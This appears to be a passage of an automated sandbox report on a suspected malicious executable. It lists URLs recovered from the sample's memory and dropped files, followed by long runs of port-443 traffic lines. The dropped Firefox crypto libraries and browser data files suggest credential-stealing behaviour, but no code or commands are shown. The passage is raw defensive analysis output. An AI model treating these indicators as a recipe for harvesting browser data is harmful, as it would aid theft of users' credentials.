                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.deezer.com/
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: content.js.15.drString found in binary or memory: https://www.google.com/chrome
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.iheart.com/podcast/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.instagram.com
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.last.fm/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.messenger.com
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/EHCFIDGCBGII
                      Source: file.exe, 00000002.00000003.1724983706.000000002409E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000002.00000002.1825004684.0000000000E37000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: file.exe, 00000002.00000002.1825004684.0000000000E37000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                      Source: file.exe, 00000002.00000003.1724983706.000000002409E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: file.exe, 00000002.00000003.1724983706.000000002409E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: file.exe, 00000002.00000003.1724983706.000000002409E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D54000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.office.com
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.tiktok.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://www.youtube.com
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://y.music.163.com/m/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
